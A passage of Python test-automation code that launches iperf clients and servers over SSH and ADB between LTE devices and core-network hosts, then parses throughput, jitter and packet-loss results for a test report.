HTML.CreateHtmlTestRowQueue(self.ping_args, 'OK', len(self.UEDevices), html_queue)
else:
HTML.CreateHtmlTestRowQueue(self.ping_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def Iperf_ComputeTime(self):
result = re.search('-t (?P<iperf_time>\d+)', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf time Not Found! \u001B[0m')
sys.exit(1)
return result.group('iperf_time')
def Iperf_ComputeModifiedBW(self, idx, ue_num):
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Iperf bandwidth Not Found! \u001B[0m')
sys.exit(1)
iperf_bandwidth = result.group('iperf_bandwidth')
if self.iperf_profile == 'balanced':
iperf_bandwidth_new = float(iperf_bandwidth)/ue_num
if self.iperf_profile == 'single-ue':
iperf_bandwidth_new = float(iperf_bandwidth)
if self.iperf_profile == 'unbalanced':
# residual is 2% of max bw
residualBW = float(iperf_bandwidth) / 50
if idx == 0:
iperf_bandwidth_new = float(iperf_bandwidth) - ((ue_num - 1) * residualBW)
else:
iperf_bandwidth_new = residualBW
iperf_bandwidth_str = '-b ' + iperf_bandwidth
iperf_bandwidth_str_new = '-b ' + ('%.2f' % iperf_bandwidth_new)
result = re.sub(iperf_bandwidth_str, iperf_bandwidth_str_new, str(self.iperf_args))
if result is None:
logging.debug('\u001B[1;37;41m Calculate Iperf bandwidth Failed! \u001B[0m')
sys.exit(1)
return result
def Iperf_analyzeV2TCPOutput(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
SSH.command('awk -f /tmp/tcp_iperf_stats.awk ' + EPC.SourceCodePath + '/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('Avg Bitrate : (?P<average>[0-9\.]+ Mbits\/sec) Max Bitrate : (?P<maximum>[0-9\.]+ Mbits\/sec) Min Bitrate : (?P<minimum>[0-9\.]+ Mbits\/sec)', SSH.getBefore())
if result is not None:
avgbitrate = result.group('average')
maxbitrate = result.group('maximum')
minbitrate = result.group('minimum')
lock.acquire()
logging.debug('\u001B[1;37;44m TCP iperf result (' + UE_IPAddress + ') \u001B[0m')
msg = 'TCP Stats :\n'
if avgbitrate is not None:
logging.debug('\u001B[1;34m Avg Bitrate : ' + avgbitrate + '\u001B[0m')
msg += 'Avg Bitrate : ' + avgbitrate + '\n'
if maxbitrate is not None:
logging.debug('\u001B[1;34m Max Bitrate : ' + maxbitrate + '\u001B[0m')
msg += 'Max Bitrate : ' + maxbitrate + '\n'
if minbitrate is not None:
logging.debug('\u001B[1;34m Min Bitrate : ' + minbitrate + '\u001B[0m')
msg += 'Min Bitrate : ' + minbitrate + '\n'
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
def Iperf_analyzeV2Output(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
result = re.search('-u', str(iperf_real_options))
if result is None:
return self.Iperf_analyzeV2TCPOutput(lock, UE_IPAddress, device_id, statusQueue, iperf_real_options)
result = re.search('Server Report:', SSH.getBefore())
if result is None:
result = re.search('read failed: Connection refused', SSH.getBefore())
if result is not None:
logging.debug('\u001B[1;37;41m Could not connect to iperf server! \u001B[0m')
else:
logging.debug('\u001B[1;37;41m Server Report and Connection refused Not Found! \u001B[0m')
return -1
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is not None:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
result = re.search('Server Report:\\\\r\\\\n(?:|\[ *\d+\].*) (?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(\d+\/..\d+) +(\((?P<packetloss>[0-9\.]+)%\))', SSH.getBefore())
if result is not None:
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
jitter = result.group('jitter')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
iperfStatus = True
msg = 'Req Bitrate : ' + req_bandwidth + '\n'
logging.debug('\u001B[1;34m Req Bitrate : ' + req_bandwidth + '\u001B[0m')
if bitrate is not None:
msg += 'Bitrate : ' + bitrate + '\n'
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
result = re.search('(?P<real_bw>[0-9\.]+) [KMG]bits/sec', str(bitrate))
if result is not None:
actual_bw = float(str(result.group('real_bw')))
result = re.search('[0-9\.]+ K', bitrate)
if result is not None:
actual_bw = actual_bw * 1000
result = re.search('[0-9\.]+ M', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000
result = re.search('[0-9\.]+ G', bitrate)
if result is not None:
actual_bw = actual_bw * 1000000000
br_loss = 100 * actual_bw / req_bw
bitperf = '%.2f ' % br_loss
msg += 'Bitrate Perf: ' + bitperf + '%\n'
logging.debug('\u001B[1;34m Bitrate Perf: ' + bitperf + '%\u001B[0m')
if packetloss is not None:
msg += 'Packet Loss : ' + packetloss + '%\n'
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
if float(packetloss) > float(self.iperf_packetloss_threshold):
msg += 'Packet Loss too high!\n'
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
iperfStatus = False
if jitter is not None:
msg += 'Jitter : ' + jitter + '\n'
logging.debug('\u001B[1;34m Jitter : ' + jitter + '\u001B[0m')
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
return 0
else:
return -2
def Iperf_analyzeV2Server(self, lock, UE_IPAddress, device_id, statusQueue, iperf_real_options):
if (not os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
return
# Computing the requested bandwidth in float
result = re.search('-b (?P<iperf_bandwidth>[0-9\.]+)[KMG]', str(iperf_real_options))
if result is None:
logging.debug('Iperf bandwidth Not Found!')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not compute Iperf bandwidth!')
return
else:
req_bandwidth = result.group('iperf_bandwidth')
req_bw = float(req_bandwidth)
result = re.search('-b [0-9\.]+K', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Kbits/sec' % req_bw
req_bw = req_bw * 1000
result = re.search('-b [0-9\.]+M', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Mbits/sec' % req_bw
req_bw = req_bw * 1000000
result = re.search('-b [0-9\.]+G', str(iperf_real_options))
if result is not None:
req_bandwidth = '%.1f Gbits/sec' % req_bw
req_bw = req_bw * 1000000000
server_file = open('iperf_server_' + self.testCase_id + '_' + device_id + '.log', 'r')
br_sum = 0.0
ji_sum = 0.0
pl_sum = 0
ps_sum = 0
row_idx = 0
for line in server_file.readlines():
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?P<jitter>[0-9\.]+ ms) +(?P<lostPack>[0-9]+)/ +(?P<sentPack>[0-9]+)', str(line))
if result is not None:
bitrate = result.group('bitrate')
jitter = result.group('jitter')
packetlost = result.group('lostPack')
packetsent = result.group('sentPack')
br = bitrate.split(' ')
ji = jitter.split(' ')
row_idx = row_idx + 1
curr_br = float(br[0])
pl_sum = pl_sum + int(packetlost)
ps_sum = ps_sum + int(packetsent)
if (br[1] == 'Kbits/sec'):
curr_br = curr_br * 1000
if (br[1] == 'Mbits/sec'):
curr_br = curr_br * 1000 * 1000
br_sum = curr_br + br_sum
ji_sum = float(ji[0]) + ji_sum
if (row_idx > 0):
br_sum = br_sum / row_idx
ji_sum = ji_sum / row_idx
br_loss = 100 * br_sum / req_bw
if (br_sum > 1000):
br_sum = br_sum / 1000
if (br_sum > 1000):
br_sum = br_sum / 1000
bitrate = '%.2f Mbits/sec' % br_sum
else:
bitrate = '%.2f Kbits/sec' % br_sum
else:
bitrate = '%.2f bits/sec' % br_sum
bitperf = '%.2f ' % br_loss
bitperf += '%'
jitter = '%.2f ms' % (ji_sum)
if (ps_sum > 0):
pl = float(100 * pl_sum / ps_sum)
packetloss = '%2.1f ' % (pl)
packetloss += '%'
else:
packetloss = 'unknown'
lock.acquire()
if (br_loss < 90):
statusQueue.put(1)
else:
statusQueue.put(0)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
req_msg = 'Req Bitrate : ' + req_bandwidth
bir_msg = 'Bitrate : ' + bitrate
brl_msg = 'Bitrate Perf: ' + bitperf
jit_msg = 'Jitter : ' + jitter
pal_msg = 'Packet Loss : ' + packetloss
statusQueue.put(req_msg + '\n' + bir_msg + '\n' + brl_msg + '\n' + jit_msg + '\n' + pal_msg + '\n')
logging.debug('\u001B[1;37;45m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;35m ' + req_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + bir_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + brl_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + jit_msg + '\u001B[0m')
logging.debug('\u001B[1;35m ' + pal_msg + '\u001B[0m')
lock.release()
else:
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, 'Could not analyze from server log')
server_file.close()
def Iperf_analyzeV3Output(self, lock, UE_IPAddress, device_id, statusQueue):
result = re.search('(?P<bitrate>[0-9\.]+ [KMG]bits\/sec) +(?:|[0-9\.]+ ms +\d+\/\d+ \((?P<packetloss>[0-9\.]+)%\)) +(?:|receiver)\\\\r\\\\n(?:|\[ *\d+\] Sent \d+ datagrams)\\\\r\\\\niperf Done\.', SSH.getBefore())
if result is None:
result = re.search('(?P<error>iperf: error - [a-zA-Z0-9 :]+)', SSH.getBefore())
lock.acquire()
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
if result is not None:
logging.debug('\u001B[1;37;41m ' + result.group('error') + ' \u001B[0m')
statusQueue.put(result.group('error'))
else:
logging.debug('\u001B[1;37;41m Bitrate and/or Packet Loss Not Found! \u001B[0m')
statusQueue.put('Bitrate and/or Packet Loss Not Found!')
lock.release()
bitrate = result.group('bitrate')
packetloss = result.group('packetloss')
lock.acquire()
logging.debug('\u001B[1;37;44m iperf result (' + UE_IPAddress + ') \u001B[0m')
logging.debug('\u001B[1;34m Bitrate : ' + bitrate + '\u001B[0m')
msg = 'Bitrate : ' + bitrate + '\n'
iperfStatus = True
if packetloss is not None:
logging.debug('\u001B[1;34m Packet Loss : ' + packetloss + '%\u001B[0m')
msg += 'Packet Loss : ' + packetloss + '%\n'
if float(packetloss) > float(self.iperf_packetloss_threshold):
logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
msg += 'Packet Loss too high!\n'
iperfStatus = False
if (iperfStatus):
statusQueue.put(0)
else:
statusQueue.put(-1)
statusQueue.put(device_id)
statusQueue.put(UE_IPAddress)
statusQueue.put(msg)
lock.release()
def Iperf_UL_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
udpIperf = True
result = re.search('-u', str(self.iperf_args))
if result is None:
udpIperf = False
ipnumbers = UE_IPAddress.split('.')
if (len(ipnumbers) == 4):
ipnumbers[3] = '1'
EPC_Iperf_UE_IPAddress = ipnumbers[0] + '.' + ipnumbers[1] + '.' + ipnumbers[2] + '.' + ipnumbers[3]
# Launch iperf server on EPC side (true for ltebox and old open-air-cn0
# But for OAI-Rel14-CUPS, we launch from python executor and we are using its IP address as iperf client address
launchFromEpc = True
if re.match('OAI-Rel14-CUPS', EPC.Type, re.IGNORECASE):
launchFromEpc = False
cmd = 'hostname -I'
ret = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, encoding='utf-8')
if ret.stdout is not None:
EPC_Iperf_UE_IPAddress = ret.stdout.strip()
port = 5001 + idx
if launchFromEpc:
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd ' + EPC.SourceCodePath + '/scripts', '\$', 5)
SSH.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if udpIperf:
SSH.command('echo $USER; nohup iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', EPC.UserName, 5)
else:
SSH.command('echo $USER; nohup iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', EPC.UserName, 5)
SSH.close()
else:
if self.ueIperfVersion == self.dummyIperfVersion:
prefix = ''
else:
prefix = ''
if self.ueIperfVersion == '2.0.5':
prefix = '/opt/iperf-2.0.5/bin/'
if udpIperf:
cmd = 'nohup ' + prefix + 'iperf -u -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log 2>&1 &'
else:
cmd = 'nohup ' + prefix + 'iperf -s -i 1 -p ' + str(port) + ' > iperf_server_' + self.testCase_id + '_' + device_id + '.log 2>&1 &'
logging.debug(cmd)
subprocess.run(cmd, shell=True, stdout=subprocess.PIPE, encoding='utf-8')
time.sleep(0.5)
# Launch iperf client on UE
if (device_id == 'OAI-UE'):
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
else:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
SSH.command('cd ' + EPC.SourceCodePath+ '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
modified_options = modified_options.replace('-R','')
time.sleep(0.5)
SSH.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if (device_id == 'OAI-UE'):
iperf_status = SSH.command('iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + ' -B ' + UE_IPAddress + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
else:
if self.ADBCentralized:
iperf_status = SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '" 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
else:
iperf_status = SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "/data/local/tmp/iperf -c ' + EPC_Iperf_UE_IPAddress + ' ' + modified_options + ' -p ' + str(port) + '"\' 2>&1 > iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
SSH.command('fromdos -o iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
SSH.command('cat iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
# TIMEOUT Case
if iperf_status < 0:
SSH.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
SSH.close()
# Kill iperf server on EPC side
if launchFromEpc:
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('killall --signal SIGKILL iperf', EPC.UserName, 5)
SSH.close()
else:
cmd = 'killall --signal SIGKILL iperf'
logging.debug(cmd)
subprocess.run(cmd, shell=True)
time.sleep(1)
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
# in case of failure, retrieve server log
if (clientStatus == -1) or (clientStatus == -2):
if launchFromEpc:
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
SSH.copyin(EPC.IPAddress, EPC.UserName, EPC.Password, EPC.SourceCodePath+ '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI-UE
if (device_id == 'OAI-UE'):
SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_' + self.testCase_id + '_' + device_id + '.log', '.')
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
def Iperf_common(self, lock, UE_IPAddress, device_id, idx, ue_num, statusQueue):
try:
# Single-UE profile -- iperf only on one UE
if self.iperf_profile == 'single-ue' and idx != 0:
return
useIperf3 = False
udpIperf = True
self.ueIperfVersion = '2.0.5'
if (device_id != 'OAI-UE'):
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# if by chance ADB server and EPC are on the same remote host, at least log collection will take care of it
SSH.command('if [ ! -d ' + EPC.SourceCodePath + '/scripts ]; then mkdir -p ' + EPC.SourceCodePath + '/scripts ; fi', '\$', 5)
SSH.command('cd ' + EPC.SourceCodePath + '/scripts', '\$', 5)
# Checking if iperf / iperf3 are installed
if self.ADBCentralized:
SSH.command('adb -s ' + device_id + ' shell "ls /data/local/tmp"', '\$', 5)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ls /data/local/tmp"\'', '\$', 60)
result = re.search('iperf3', SSH.getBefore())
if result is None:
result = re.search('iperf', SSH.getBefore())
if result is None:
message = 'Neither iperf nor iperf3 installed on UE!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
SSH.close()
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
else:
if self.ADBCentralized:
SSH.command('adb -s ' + device_id + ' shell "/data/local/tmp/iperf --version"', '\$', 5)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "/data/local/tmp/iperf --version"\'', '\$', 60)
result = re.search('iperf version 2.0.5', SSH.getBefore())
if result is not None:
self.ueIperfVersion = '2.0.5'
result = re.search('iperf version 2.0.10', SSH.getBefore())
if result is not None:
self.ueIperfVersion = '2.0.10'
else:
useIperf3 = True
SSH.close()
else:
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('iperf --version', '\$', 5)
result = re.search('iperf version 2.0.5', SSH.getBefore())
if result is not None:
self.ueIperfVersion = '2.0.5'
result = re.search('iperf version 2.0.10', SSH.getBefore())
if result is not None:
self.ueIperfVersion = '2.0.10'
SSH.close()
# in case of iperf, UL has its own function
if (not useIperf3):
result = re.search('-R', str(self.iperf_args))
if result is not None:
self.Iperf_UL_common(lock, UE_IPAddress, device_id, idx, ue_num, statusQueue)
return
# Launch the IPERF server on the UE side for DL
if (device_id == 'OAI-UE'):
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
SSH.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
SSH.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
udpIperf = False
else:
SSH.command('echo $USER; nohup iperf -B ' + UE_IPAddress + ' -u -s -i 1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.UEUserName, 5)
else:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
SSH.command('cd ' + EPC.SourceCodePath + '/scripts', '\$', 5)
if self.ADBCentralized:
if (useIperf3):
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/iperf3 -s &', '\$', 5)
else:
SSH.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
result = re.search('-u', str(self.iperf_args))
if result is None:
SSH.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
udpIperf = False
else:
SSH.command('echo $USER; nohup adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 5)
else:
SSH.command('rm -f iperf_server_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
SSH.command('echo $USER; nohup ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "/data/local/tmp/iperf -u -s -i 1" \' 2>&1 > iperf_server_' + self.testCase_id + '_' + device_id + '.log &', self.ADBUserName, 60)
time.sleep(0.5)
SSH.close()
# Launch the IPERF client on the EPC side for DL (true for ltebox and old open-air-cn
# But for OAI-Rel14-CUPS, we launch from python executor
launchFromEpc = True
if re.match('OAI-Rel14-CUPS', EPC.Type, re.IGNORECASE):
launchFromEpc = False
if launchFromEpc:
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cd ' + EPC.SourceCodePath + '/scripts', '\$', 5)
iperf_time = self.Iperf_ComputeTime()
time.sleep(0.5)
if udpIperf:
modified_options = self.Iperf_ComputeModifiedBW(idx, ue_num)
else:
modified_options = str(self.iperf_args)
time.sleep(0.5)
if launchFromEpc:
SSH.command('rm -f iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
else:
if (os.path.isfile('iperf_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_' + self.testCase_id + '_' + device_id + '.log')
if (useIperf3):
SSH.command('stdbuf -o0 iperf3 -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
clientStatus = 0
self.Iperf_analyzeV3Output(lock, UE_IPAddress, device_id, statusQueue)
else:
if launchFromEpc:
iperf_status = SSH.command('stdbuf -o0 iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 | stdbuf -o0 tee iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', int(iperf_time)*5.0)
else:
if self.ueIperfVersion == self.dummyIperfVersion:
prefix = ''
else:
prefix = ''
if self.ueIperfVersion == '2.0.5':
prefix = '/opt/iperf-2.0.5/bin/'
cmd = prefix + 'iperf -c ' + UE_IPAddress + ' ' + modified_options + ' 2>&1 > iperf_' + self.testCase_id + '_' + device_id + '.log'
message = cmd + '\n'
logging.debug(cmd)
ret = subprocess.run(cmd, shell=True)
iperf_status = ret.returncode
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('cat ' + EPC.SourceCodePath + '/scripts/iperf_' + self.testCase_id + '_' + device_id + '.log', '\$', 5)
if iperf_status < 0:
if launchFromEpc:
SSH.close()
message = 'iperf on UE (' + str(UE_IPAddress) + ') crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.ping_iperf_wrong_exit(lock, UE_IPAddress, device_id, statusQueue, message)
return
clientStatus = self.Iperf_analyzeV2Output(lock, UE_IPAddress, device_id, statusQueue, modified_options)
SSH.close()
# Kill the IPERF server that runs in background
if (device_id == 'OAI-UE'):
SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
SSH.command('killall iperf', '\$', 5)
else:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ps" | grep --color=never iperf | grep -v grep\'', '\$', 60)
result = re.search('shell +(?P<pid>\d+)', SSH.getBefore())
if result is not None:
pid_iperf = result.group('pid')
if self.ADBCentralized:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"\'', '\$', 60)
SSH.close()
# if the client report is absent, try to analyze the server log file
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
if (device_id == 'OAI-UE'):
SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
else:
SSH.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, EPC.SourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
# fromdos has to be called on the python executor not on ADB server
cmd = 'fromdos -o iperf_server_' + self.testCase_id + '_' + device_id + '.log'
subprocess.run(cmd, shell=True)
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI UE:
if (device_id == 'OAI-UE'):
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
if not launchFromEpc:
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
else:
SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', EPC.SourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
def IperfNoS1(self):
if RAN.eNBIPAddress == '' or RAN.eNBUserName == '' or RAN.eNBPassword == '' or self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
server_on_enb = re.search('-R', str(self.iperf_args))
if server_on_enb is not None:
iServerIPAddr = RAN.eNBIPAddress
iServerUser = RAN.eNBUserName
iServerPasswd = RAN.eNBPassword
iClientIPAddr = self.UEIPAddress
iClientUser = self.UEUserName
iClientPasswd = self.UEPassword
else:
iServerIPAddr = self.UEIPAddress
iServerUser = self.UEUserName
iServerPasswd = self.UEPassword
iClientIPAddr = RAN.eNBIPAddress
iClientUser = RAN.eNBUserName
iClientPasswd = RAN.eNBPassword
if self.iperf_options != 'sink':
# Starting the iperf server
SSH.open(iServerIPAddr, iServerUser, iServerPasswd)
# args SHALL be "-c client -u any"
# -c 10.0.1.2 -u -b 1M -t 30 -i 1 -fm -B 10.0.1.1
# -B 10.0.1.1 -u -s -i 1 -fm
server_options = re.sub('-u.*$', '-u -s -i 1 -fm', str(self.iperf_args))
server_options = server_options.replace('-c','-B')
SSH.command('rm -f /tmp/tmp_iperf_server_' + self.testCase_id + '.log', '\$', 5)
SSH.command('echo $USER; nohup iperf ' + server_options + ' > /tmp/tmp_iperf_server_' + self.testCase_id + '.log 2>&1 &', iServerUser, 5)
time.sleep(0.5)
SSH.close()
# Starting the iperf client
modified_options = self.Iperf_ComputeModifiedBW(0, 1)
modified_options = modified_options.replace('-R','')
iperf_time = self.Iperf_ComputeTime()
SSH.open(iClientIPAddr, iClientUser, iClientPasswd)
SSH.command('rm -f /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', 5)
iperf_status = SSH.command('stdbuf -o0 iperf ' + modified_options + ' 2>&1 | stdbuf -o0 tee /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', int(iperf_time)*5.0)
status_queue = SimpleQueue()
lock = Lock()
if iperf_status < 0:
message = 'iperf on OAI UE crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
clientStatus = -2
else:
if self.iperf_options == 'sink':
clientStatus = 0
status_queue.put(0)
status_queue.put('OAI-UE')
status_queue.put('10.0.1.2')
status_queue.put('Sink Test : no check')
else:
clientStatus = self.Iperf_analyzeV2Output(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
SSH.close()
# Stopping the iperf server
if self.iperf_options != 'sink':
SSH.open(iServerIPAddr, iServerUser, iServerPasswd)
